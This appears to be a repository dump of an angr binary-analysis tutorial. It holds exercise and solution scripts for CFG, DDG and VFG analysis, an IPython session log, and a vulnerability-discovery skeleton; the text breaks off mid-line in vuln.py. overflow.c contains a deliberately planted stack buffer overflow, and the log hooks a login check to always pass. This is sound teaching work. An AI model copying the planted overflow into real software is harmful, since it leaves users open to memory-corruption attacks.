├── README.md ├── cfg_accurate ├── 0.py ├── 0.solution.py ├── 1.py ├── 1.solution.py └── fauxware ├── cfg_fast ├── 0.py ├── 0.solution.py ├── 1.py ├── 1.solution.py ├── cfg_2 └── fauxware ├── ddg ├── 0.py ├── 0.solution.py └── fauxware ├── ipython_history.txt ├── vfg ├── 0.py ├── 0.solution.py └── fauxware ├── vuln_discovery ├── overflow ├── overflow.c ├── vuln.py └── vuln.solution.py ├── vuln_discovery_2 ├── overflow3-28d8a442fb232c0c ├── overflow3-28d8a442fb232c0c.c ├── overflow3.py └── overflow3.solution.py └── vuln_discovery_simple ├── overflow3-simplified ├── overflow3-simplified.c ├── overflow3.py └── overflow3.solution.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | # SecDev angr Tutorial 3 | 4 | The slides are [here](https://goo.gl/YHdmDB). 5 | -------------------------------------------------------------------------------- /cfg_accurate/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states. 5 | ''' 6 | 7 | import angr 8 | 9 | # load the binary 10 | project = angr.Project("fauxware") 11 | 12 | # WRITEME: generate an accurate CFG 13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True' 14 | cfg = None 15 | 16 | # Alright, we got it! 17 | if cfg is not None: 18 | all_nodes = cfg.nodes() 19 | 20 | for n in all_nodes: 21 | print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx)) 22 | 23 | -------------------------------------------------------------------------------- /cfg_accurate/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states. 5 | ''' 6 | 7 | import angr 8 | 9 | # load the binary 10 | project = angr.Project("fauxware") 11 | 12 | # WRITEME: generate an accurate CFG 13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True' 14 | cfg = project.analyses.CFGAccurate(keep_state=True) 15 | 16 | # Alright, we got it! 17 | if cfg is not None: 18 | all_nodes = cfg.nodes() 19 | 20 | for n in all_nodes: 21 | print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx)) 22 | 23 | -------------------------------------------------------------------------------- /cfg_accurate/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Demonstrate how to normalize a CFG 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the binary 12 | project = angr.Project('fauxware') 13 | 14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization 15 | cfg_norm = None 16 | 17 | # this is a normal CFG 18 | cfg = project.analyses.CFG() 19 | 20 | # There should be some different nodes 21 | if cfg_norm is not None: 22 | nodes_norm = cfg_norm.nodes() 23 | nodes = cfg.nodes() 24 | 25 | nodes_only_in_normalized = set() 26 | 27 | for n in nodes_norm: 28 | if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]): 29 | continue 30 | nodes_only_in_normalized.add(n) 31 | 32 | assert nodes_only_in_normalized 33 | pprint(nodes_only_in_normalized) 34 | 35 | -------------------------------------------------------------------------------- /cfg_accurate/1.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Demonstrate how to normalize a CFG 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the binary 12 | project = angr.Project('fauxware') 13 | 14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization 15 | cfg_norm = project.analyses.CFG(normalize=True) 16 | 17 | # this is a normal CFG 18 | cfg = project.analyses.CFG() 19 | 20 | # There should be some different nodes 21 | if cfg_norm is not None: 22 | nodes_norm = cfg_norm.nodes() 23 | nodes = cfg.nodes() 24 | 25 | nodes_only_in_normalized = set() 26 | 27 | for n in nodes_norm: 28 | if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]): 29 | continue 30 | nodes_only_in_normalized.add(n) 31 | 32 | assert nodes_only_in_normalized 33 | pprint(nodes_only_in_normalized) 34 | 35 | -------------------------------------------------------------------------------- /cfg_accurate/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_accurate/fauxware -------------------------------------------------------------------------------- /cfg_fast/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | project = angr.Project("fauxware") 8 | 9 | # WRITEME: generate a CFG 10 | cfg = None 11 | 12 | # WRITEME: print out all nodes 13 | all_nodes = None 14 | pprint(all_nodes) 15 | 16 | # WRITEME: get any CFG node whose address is 0x80485fc 17 | # 0x80485fc is the address of main() 18 | node = None 19 | print("Node 0x80485fc: %s" % node) 20 | 21 | # WRITEME: get all CFG node whose address is 0x80485fc 22 | node_list = None 23 | print("All node whose address is 0x80485fc: %s" % node_list) 24 | 25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG 26 | successors = None 27 | print("All successors to node %s are:" % node) 28 | pprint(successors) 29 | 30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG node itself 31 | # this time it does not include the fakeret target 32 | successors = None 33 | print("All successors to node %s are:" % node) 34 | pprint(successors) 35 | 36 | -------------------------------------------------------------------------------- /cfg_fast/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | project = angr.Project("fauxware") 8 | 9 | # WRITEME: generate a CFG 10 | cfg = project.analyses.CFG() 11 | 12 | # WRITEME: print out all nodes 13 | all_nodes = cfg.nodes() 14 | pprint(all_nodes) 15 | 16 | # WRITEME: get any CFG node whose address is 0x80485fc 17 | # 0x80485fc is the address of main() 18 | node = cfg.get_any_node(0x80485fc) 19 | print("Node 0x80485fc: %s" % node) 20 | 21 | # WRITEME: get all CFG node whose address is 0x80485fc 22 | node_list = cfg.get_all_nodes(0x80485fc) 23 | print("All node whose address is 0x80485fc: %s" % node_list) 24 | 25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG 26 | successors = cfg.get_successors(node, excluding_fakeret=False) 27 | print("All successors to node %s are:" % node) 28 | pprint(successors) 29 | 30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG node itself 31 | # this time it does not include the fakeret target 32 | successors = node.successors 33 | print("All successors to node %s are:" % node) 34 | pprint(successors) 35 | 36 | -------------------------------------------------------------------------------- /cfg_fast/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | p = angr.Project("cfg_2") 8 | 9 | # WRITEME: generate a CFG that collects data references during CFG recovery 10 | # Note that by default it resolves indirect jumps (like jump tables) 11 | cfg = None 12 | 13 | # WRITEME: print out the recovered indirect jumps 14 | indirect_jumps = None 15 | print("Here are all indirect jumps from the binary:") 16 | pprint(indirect_jumps) 17 | 18 | # WRITEME: print out the recovered list of memory data 19 | memory_data = None 20 | print("Here are all recovered memory data from the binary:") 21 | pprint(memory_data) 22 | 23 | # WRITEME: print out the reversed map between instruction addresses to memory data 24 | ins_to_memdata = None 25 | print("Here is a mapping between instruction address and memory data:") 26 | pprint(ins_to_memdata) 27 | 28 | -------------------------------------------------------------------------------- /cfg_fast/1.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | p = angr.Project("cfg_2") 8 | 9 | # WRITEME: generate a CFG that collects data references during CFG recovery 10 | # Note that by default it resolves indirect jumps (like jump tables) 11 | cfg = p.analyses.CFG(collect_data_references=True) 12 | 13 | # WRITEME: print out the recovered indirect jumps 14 | indirect_jumps = cfg.indirect_jumps 15 | print("Here are all indirect jumps from the binary:") 16 | pprint(indirect_jumps) 17 | 18 | # WRITEME: print out the recovered list of memory data 19 | memory_data = cfg.memory_data 20 | print("Here are all recovered memory data from the binary:") 21 | pprint(memory_data) 22 | 23 | # WRITEME: print out the reversed map between instruction addresses to memory data 24 | ins_to_memdata = cfg._insn_addr_to_memory_data 25 | print("Here is a mapping between instruction address and memory data:") 26 | pprint(ins_to_memdata) 27 | 28 | -------------------------------------------------------------------------------- /cfg_fast/cfg_2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/cfg_2 -------------------------------------------------------------------------------- /cfg_fast/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/fauxware -------------------------------------------------------------------------------- /ddg/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the project 12 | 13 | p = angr.Project("fauxware") 14 | 15 | # WRITEME: get the address of function `authenticate` 16 | cfg_fast = None 17 | main_func = None 18 | auth_func = None 19 | 20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis 21 | # we don't want to mess with the default (project-level) knowledge base 22 | # this is just a good habit :-) 23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin) 24 | 25 | # WRITEME: generate an accurate CFG 26 | # Recommended parameters: 27 | # starts=(main_func,addr,) 28 | # context_sensitivity_level=2 29 | # keep_state=True # states must be kept and stored to allow dependence analysis later 30 | cfg = None 31 | 32 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base, and specify the `start` 33 | ddg = None 34 | 35 | if ddg is not None: 36 | # YES it's done! Let's see what's there 37 | print("=== Statement Dependence Graph ===") 38 | print("Edges:") 39 | edges = ddg.graph.edges(data=True) 40 | pprint(edges, width=120) 41 | 42 | print("=== Data Dependence Graph ===") 43 | print("Edges:") 44 | edges = ddg.data_graph.edges(data=True) 45 | pprint(edges, width=120) 46 | 47 | print("=== Simplified Data Dependence Graph ===") 48 | print("Edges:") 49 | edges = ddg.simplified_data_graph.edges(data=True) 50 | pprint(edges, width=120) 51 | 52 | -------------------------------------------------------------------------------- /ddg/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the project 12 | 13 | p = angr.Project("fauxware") 14 | 15 | # WRITEME: get the address of function `authenticate` 16 | cfg_fast = p.analyses.CFG() 17 | main_func = p.kb.functions.function(name='main') 18 | auth_func = p.kb.functions.function(name='authenticate') 19 | 20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis 21 | # we don't want to mess with the default (project-level) knowledge base 22 | # this is just a good habit :-) 23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin) 24 | 25 | # WRITEME: generate an accurate CFG 26 | # Recommended parameters: 27 | # starts=(main_func,addr,) 28 | # context_sensitivity_level=2 29 | # keep_state=True # states must be kept and stored to allow dependence analysis later 30 | cfg = p.analyses.CFGAccurate(starts=(main_func.addr,), 31 | context_sensitivity_level=2, 32 | keep_state=True 33 | ) 34 | 35 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base 36 | ddg = p.analyses.DDG(cfg=cfg, start=auth_func.addr, kb=kb) 37 | 38 | if ddg is not None: 39 | # YES it's done! Let's see what's there 40 | print("=== Statement Dependence Graph ===") 41 | print("Edges:") 42 | edges = ddg.graph.edges(data=True) 43 | pprint(edges, width=120) 44 | 45 | print("=== Data Dependence Graph ===") 46 | print("Edges:") 47 | edges = ddg.data_graph.edges(data=True) 48 | pprint(edges, width=120) 49 | 50 | print("=== Simplified Data Dependence Graph ===") 51 | print("Edges:") 52 | edges = ddg.simplified_data_graph.edges(data=True) 53 | pprint(edges, width=120) 54 | 55 | -------------------------------------------------------------------------------- /ddg/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/ddg/fauxware -------------------------------------------------------------------------------- /ipython_history.txt: -------------------------------------------------------------------------------- 1 | 2 | # Captured on Windows 10 with Python 2.7.11 + IPython 5.1.0 3 | 4 | # This is the beginning of IPython history 5 | import angr 6 | 7 | # Load a the fauxware project 8 | project = angr.Project("fauxware/fauxware") 9 | project.loader.main_bin 10 | project.loader.main_object 11 | project.loader.all_objects 12 | project.loader.main_object.imports 13 | project.loader.main_object.sections 14 | type(project.loader.main_object.sections) 15 | project.loader.main_object.sections 16 | project.loader.main_object.sections.raw_list 17 | 18 | winproject = angr.Project("C:/Windows/System32/notepad.exe") # it took a long time and did not finish, Yan had to ctrl-c it. 19 | 20 | winproject = angr.Project("C:/Windows/System32/notepad.exe", auto_load_libs=False) # this finished very quickly 21 | winproject.loader.missing_dependencies 22 | winproject.loader.all_objects 23 | winproject.loader.main_object.imports 24 | winproject.loader.main_object.sections 25 | winproject.loader.main_object.sections.raw_list 26 | cfg = winproject.analyses.CFG() 27 | cfg = winproject.analyses.CFG(show_progressbar=True) 28 | len(cfg.nodes()) 29 | cfg.nodes() 30 | cfg.graph 31 | cfg.graph.edges() 32 | winproject.kb 33 | winproject.kb.callgraph 34 | winproject.kb.callgraph.edges() 35 | [ map(hex, x) for x in winproject.kb.callgraph.edges() ] 36 | 37 | history # Yan was demonstrating the "history" command in IPython 38 | 39 | winproject.kb 40 | winproject.kb.functions 41 | winproject.kb.functions[project.entry] 42 | winproject.kb.functions[winproject.entry] 43 | entry_function = winproject.kb.functions[winproject.entry] 44 | entry_function.graph 45 | entry_function.graph.edges() 46 | entry_function.blocks 47 | list(entry_function.blocks) 48 | entry_function.code_constants 49 | 50 | # Print out all blocks 51 | for block in entry_function.blocks: print block 52 | 53 | # Print out the disassembly of all blocks 54 | for block in entry_function.blocks: block.pp() 55 | 56 | # Print the VEX IR of all blocks 57 | for block in entry_function.blocks: block.vex.pp() 58 | 59 | block = winproject.factory.block(0x14001957e) 60 | block.pp() 61 | simgr = winproject.factory.simulation_manager() 62 | simgr 63 | simgr.active[0] 64 | simgr.active[0].regs.rax 65 | simgr.active[0].regs.rcx 66 | simgr.step() 67 | simgr.step() 68 | simgr.step() 69 | simgr.active[0] 70 | simgr.step() 71 | simgr.active[0] 72 | cfg.get_any_node(0x141000730) 73 | cfg 74 | 75 | simgr = project.factory.simulation_manager() 76 | cfg = project.analyses.CFG(show_progressbar=True) 77 | 78 | simgr.step() 79 | simgr.active[0] 80 | simgr.step() 81 | simgr.active[0] 82 | cfg.get_any_node(0x400540) 83 | cfg.get_any_node(0x400540).successors 84 | simgr.step(until=lamda sm: len(sm.active) != 1) 85 | simgr.step(until=lambda sm: len(sm.active) != 1) 86 | simgr.active 87 | simgr.active[0].history 88 | simgr.active[0].history.bbl_addrs 89 | list(simgr.active[0].history.bbl_addrs) 90 | map(hex, list(simgr.active[0].history.bbl_addrs)) 91 | project.loader.describe_addr(0x1000020) 92 | map(hex, list(simgr.active[0].history.descriptions)) 93 | maplist(simgr.active[0].history.descriptions) 94 | list(simgr.active[0].history.descriptions) 95 | 96 | cfg.get_any_node(0x40068e) 97 | cfg.get_any_node(0x40068e).successors 98 | state = simgr.active[0] 99 | 100 | state.history 101 | state.history.actions 102 | list(state.history.actions) 103 | list(state.history.guards) 104 | list(state.history.jump_guards) 105 | list(simgr.active[0].history.jump_guards) 106 | list(simgr.active[1].history.jump_guards) 107 | 108 | simgr.active[0].rax 109 | simgr.active[0].regs.rax 110 | simgr.active[1].regs.rax 111 | state.memory.load(state.regs.rsp, 8) 112 | state.memory.load(state.regs.rsp, 8, endness="Iend_LE") 113 | 114 | state.posix.files 115 | stdin = state.posix.files[0] 116 | stdin.all_bytes() 117 | state.solver.eval(state.posix.files[0]) 118 | state.solver.eval(state.posix.files[0].all_bytes()) 119 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str) 120 | state = simgr.active[1] 121 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str) 122 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str) 123 | stdin = state.posix.files[0] 124 | state = simgr.active[0] 125 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str) 126 | state.posix.files[0] 127 | stdin.read_from 128 | stdin.read_from? 129 | stdin.read_pos? 130 | stdin.read? 131 | stdin.contents 132 | stdin.content 133 | stdin.content.load(10, 8) 134 | state.solver.eval_upto(stdin.content.load(9, 8), 10, cast_to=str) 135 | simgr.active 136 | simgr.mp_active 137 | simgr.mp_active.regs.rax 138 | simgr.mp_active.regs.rax.mp_items 139 | simgr.mp_active.solver.eval_upto(simgr.mp_active.files[0].content.load(9, 8), 1, cast_to=str) 140 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str) 141 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str).mp_items 142 | state.history.jump_guard 143 | 144 | state.history.jump_guard.op 145 | state.history.jump_guard.args 146 | state.history.jump_guard.args 147 | state.history.jump_guard.args[0] 148 | state.history.jump_guard.args[0] 149 | state.history.jump_guard.args[0] + 0 150 | simgr.run() 151 | 152 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items 153 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items 154 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[1].all_bytes(), 2, cast_to=str).mp_items 155 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[1].all_bytes(), 2, cast_to=str).mp_items 156 | simgr.mp_deadended.posix.files 157 | simgr.mp_deadended.posix.files.mp_items 158 | simgr.mp_deadended.solver.constraints 159 | simgr.mp_deadended.solver.jump_guards.mp_map(list) 160 | simgr.mp_deadended.history.jump_guards.mp_map(list) 161 | simgr.mp_deadended.history.jump_guards.mp_map(list).mp_items 162 | simgr = project.factory.simulation_manager() 163 | simgr 164 | 165 | cfg.functions 166 | cfg.functions.keys() 167 | project.loader.main_object.symbols_by_addr 168 | project.kb.functions['accepted'] 169 | 170 | simgr.explore(find=project.kb.functions['accepted'].addr) 171 | simgr.found 172 | simgr.found.posix.dumps(0) 173 | simgr.found[0].posix.dumps(0) 174 | simgr = project.factory.simulation_manager() 175 | simgr 176 | 177 | simgr.use_technique(angr.exploration_techniques.DFS()) 178 | # Use the DFS exploration technique 179 | simgr._hooks_all 180 | simgr.step() 181 | simgr.step() 182 | simgr.step() 183 | simgr.step() 184 | simgr.step() 185 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes) 186 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes) 187 | simgr.step(until=lambda sm: 'deferred' in sm.stashes) 188 | sm.deferred 189 | simgr.step(until=lambda sm: len(sm.deferred) != 0) 190 | simgr.step() 191 | simgr.step() 192 | simgr.step(until=lambda sm: len(sm.deferred) != 0) 193 | simgr.step() 194 | simgr.step() 195 | simgr.step() 196 | simgr.step() 197 | simgr.step() 198 | simgr.step() 199 | simgr.step() 200 | simgr.step() 201 | simgr.step() 202 | simgr.step() 203 | simgr.step() 204 | simgr.step() 205 | simgr.step() 206 | simgr.step() 207 | simgr.step() 208 | simgr.step() 209 | simgr.step() 210 | simgr.step() 211 | simgr.step() 212 | simgr.step() 213 | simgr.step() 214 | simgr.step() 215 | simgr.step() 216 | simgr.step() 217 | simgr.step() 218 | simgr.step() 219 | simgr.step() 220 | simgr.step() 221 | simgr.step() 222 | simgr.step() 223 | simgr.step() 224 | simgr.step() 225 | simgr.step() 226 | simgr.step() 227 | simgr.step() 228 | simgr.step() 229 | simgr.step() 230 | simgr.step() 231 | simgr.step() 232 | simgr.step() 233 | simgr.step() 234 | simgr.step() 235 | def always_succeed(state): state.regs.rax = 1 236 | project.hook? 237 | project.hook(0x4007b9, always_succeed, length=0) 238 | 239 | simgr = project.factory.simulation_manager() 240 | simgr.run() 241 | simgr.mp_deadended 242 | simgr.mp_deadended.posix.dumps(1) 243 | simgr.mp_deadended.posix.dumps(1).mp_items 244 | class Return0(angr.SimProcedure): def run(state): return 0 245 | class Return0(angr.SimProcedure): 246 | def run(self, state): 247 | return 0 248 | project = angr.Project("fauxware/fauxware") 249 | project.hook(0x400664, Return0) 250 | project.hook(0x400664, Return0()) 251 | project.hook(0x400664, Return0(), replace=True) 252 | simgr = project.factory.simulation_manager() 253 | simgr.run() 254 | simgr.deadended[0].posix.dumps(1) 255 | simgr.deadended[0].posix.dumps(0) 256 | simgr.deadended[0].posix.dumps(1) 257 | simgr = winproject.factory.simulation_manager() 258 | simgr.step(n=10) 259 | simgr = winproject.factory.simulation_manager() 260 | simgr.step() 261 | simgr.step() 262 | simgr.step() 263 | simgr.step() 264 | simgr.step() 265 | simgr.step() 266 | simgr.step() 267 | simgr.step() 268 | simgr.step() 269 | simgr.step() 270 | simgr.step() 271 | debug 272 | 273 | project = angr.Project("f:/angr/angr-doc/examples/whitehat_crypto400/whitehat_crypto400") 274 | project.loader.main_object 275 | project.loader.main_object.symbols_by_addr 276 | project.loader.main_object.imports 277 | project.loader.main_object 278 | project.loader.all_objects 279 | 280 | simgr = project.factory.simulation_manager() 281 | simgr.step(until=lambda sm=len(sm.active) >= 10) 282 | simgr.step(until=lambda sm:len(sm.active) >= 10) 283 | simgr.step(until=lambda sm:len(sm.active) >= 20) 284 | simgr.step(until=lambda sm:len(sm.active) >=100) 285 | simgr 286 | 287 | simgr.step(until=lambda sm:len(sm.active) >= 100) 288 | 289 | # Use DFS instead of BFS for symbolic exploration 290 | simgr.use_technique(angr.exploration_techniques.DFS()) 291 | simgr.step() 292 | simgr.step() 293 | simgr.step() 294 | simgr.step() 295 | simgr.step() 296 | simgr.step() 297 | simgr.step() 298 | simgr.step() 299 | simgr.step() 300 | simgr.step() 301 | simgr.step() 302 | simgr.step() 303 | simgr.step() 304 | simgr.step() 305 | simgr.step() 306 | simgr.step() 307 | simgr.step() 308 | simgr.step(n=10) 309 | simgr.step(n=10) 310 | simgr.step(n=10) 311 | simgr.step(n=10) 312 | simgr.step(n=10) 313 | simgr.step(n=100) 314 | simgr.step(n=100) 315 | 316 | project 317 | project.kb 318 | project.kb.functions 319 | project.kb.functions.keys() 320 | cfg = project.analyses.CFG() 321 | project = angr.Project("fauxware/fauxware") 322 | cfg = project.analyses.CFG() 323 | project.kb.functions 324 | project.kb.functions.keys() 325 | project.kb.functions.values() 326 | project.kb.functions.values()[0] 327 | func = project.kb.functions.values()[0] 328 | func.name 329 | func.addr 330 | func.graph -------------------------------------------------------------------------------- /vfg/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to understand the stack layout of the main function by performing generating a VFG on it. 5 | ''' 6 | 7 | from pprint import pprint 8 | from collections import defaultdict 9 | 10 | import angr 11 | 12 | 13 | # create the project 14 | project = angr.Project("fauxware") 15 | 16 | # WRITEME: generate a CFG first so we have access to all functions 17 | cfg = None 18 | 19 | # WRITEME: get the address of the main function 20 | main_func = None 21 | 22 | # WRITEME: run VFG on it 23 | # Here is the suggested parameter setup 24 | # context_sensitivity_level: 3 25 | # interfunction_level: 3 26 | vfg = None 27 | print("VFG analysis is over. We have some nodes now:") 28 | if vfg is not None: 29 | pprint(vfg.graph.nodes()) 30 | 31 | # WRITEME: get the input state to the very last basic block 32 | # the very last basic block in the main function is 0x80486e8 33 | # it should have captured all previous effects 34 | last_node = None 35 | last_state = None 36 | 37 | # WRITEME: Get the memory object. 38 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory) 39 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory) 40 | memory = None 41 | print("Program memory of the very last state: %s" % memory) 42 | 43 | # WRITEME: Let's take a look at the regions 44 | regions = None 45 | print("All memory regions on the stack:") 46 | pprint(regions) 47 | 48 | if regions is not None: 49 | # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region 50 | main_func_region = None 51 | alocs = None 52 | 53 | print("Abstract locations of the main procedure are:") 54 | pprint(alocs) 55 | 56 | # WRITEME: Derive stack layout information from abstract locations 57 | # you may did a little bit into the source code SimuVEX and claripy to see what members an aloc has. 58 | # related code are abstract_memory.py in SimuVEX and the vsa subpackage in claripy. 59 | # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets. 60 | # what we want is a list of stack offset and size of the corresponding memory access 61 | # let's do it here 62 | 63 | stack_layout = defaultdict(set) # map offset to size 64 | 65 | # WRITEME: traverse alocs 66 | 67 | print("The stack layout looks like:") 68 | for offset in sorted(stack_layout.keys(), reverse=True): 69 | print("%#x %s" % (offset, stack_layout[offset])) 70 | 71 | -------------------------------------------------------------------------------- /vfg/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to understand the stack layout of the main function by performing generating a VFG on it. 5 | ''' 6 | 7 | from pprint import pprint 8 | from collections import defaultdict 9 | 10 | import angr 11 | 12 | 13 | # create the project 14 | project = angr.Project("fauxware") 15 | 16 | # WRITEME: generate a CFG first so we have access to all functions 17 | cfg = project.analyses.CFG() 18 | 19 | # WRITEME: get the address of the main function 20 | main_func = project.kb.functions.function(name='main') 21 | 22 | # WRITEME: run VFG on it 23 | # Here is the suggested parameter setup 24 | # context_sensitivity_level: 3 25 | # interfunction_level: 3 26 | vfg = project.analyses.VFG(start=main_func.addr, 27 | context_sensitivity_level=3, 28 | interfunction_level=3 29 | ) 30 | print("VFG analysis is over. We have some nodes now:") 31 | pprint(vfg.graph.nodes()) 32 | 33 | # WRITEME: get the input state to the very last basic block 34 | # the very last basic block in the main function is 0x80486e8 35 | # it should have captured all previous effects 36 | last_node = vfg.get_any_node(0x80486e8) 37 | last_state = last_node.state 38 | 39 | # WRITEME: Get the memory object. 40 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory) 41 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory) 42 | memory = last_state.memory 43 | print("Program memory of the very last state: %s" % memory) 44 | 45 | # WRITEME: Let's take a look at the regions 46 | regions = memory.regions 47 | print("All memory regions on the stack:") 48 | pprint(regions) 49 | 50 | if regions is not None: 51 | # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region 52 | main_func_region = regions.get('stack_%#x' % main_func.addr) 53 | alocs = main_func_region.alocs 54 | 55 | print("Abstract locations of the main procedure are:") 56 | pprint(alocs) 57 | 58 | # WRITEME: Derive stack layout information from abstract locations 59 | # you may did a little bit into the source code SimuVEX and claripy to see what members an aloc has. 60 | # related code are abstract_memory.py in SimuVEX and the vsa subpackage in claripy. 61 | # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets. 62 | # what we want is a list of stack offset and size of the corresponding memory access 63 | # let's do it here 64 | 65 | stack_layout = defaultdict(set) # map offset to size 66 | for aloc in alocs.values(): 67 | for segment in aloc._segment_list: 68 | stack_layout[segment.offset].add(segment.size) 69 | 70 | print("The stack layout looks like:") 71 | for offset in sorted(stack_layout.keys(), reverse=True): 72 | print("%#x %s" % (offset, stack_layout[offset])) 73 | 74 | -------------------------------------------------------------------------------- /vfg/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vfg/fauxware -------------------------------------------------------------------------------- /vuln_discovery/overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery/overflow -------------------------------------------------------------------------------- /vuln_discovery/overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | char buf[128]; 7 | unsigned char size; 8 | 9 | printf("How much to read? "); 10 | scanf("%hhd\n", &size); 11 | 12 | if (size > 128) printf("Uh oh, reading up to %d bytes...\n", size); 13 | printf("Received: %d bytes.\n", fread(buf, 1, size, stdin)); 14 | } 15 | -------------------------------------------------------------------------------- /vuln_discovery/vuln.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | # load the binary 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False }) 5 | 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases: 7 | # 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 9 | # 2. The return address is unchanged and pointing inside the program (normal case) 10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 11 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 12 | def state_vuln_filter(state): 13 | # get the saved instruction pointer from the stack 14 | pass 15 | print "Checking saved EIP:", saved_eip 16 | 17 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 18 | pass 19 | 20 | # next, create constraints representing an unsafe condition. In this case, 21 | # let's check if the return address can point *outside* of the program. 22 | pass 23 | 24 | # check if the state is satisfiable with these conditions, and return True if it is 25 | pass 26 | 27 | # get a new simulation manager from the project factory 28 | simgr = project.factory.simgr() 29 | 30 | # initiate a "vuln" stash 31 | simgr.stashes['vuln'] = [ ] 32 | 33 | # the starting state has no return address on the stack, so it will trigger our vuln filter. 34 | # We can step it until it no longer triggers the filter before starting the actual analysis. 35 | print "Initializing initial state..." 36 | while state_vuln_filter(simgr.active[0]): 37 | simgr.step() 38 | 39 | # Now that we are all set up, let's loop until a vulnerable state has been found 40 | print "Searching for the vulnerability!" 41 | while not 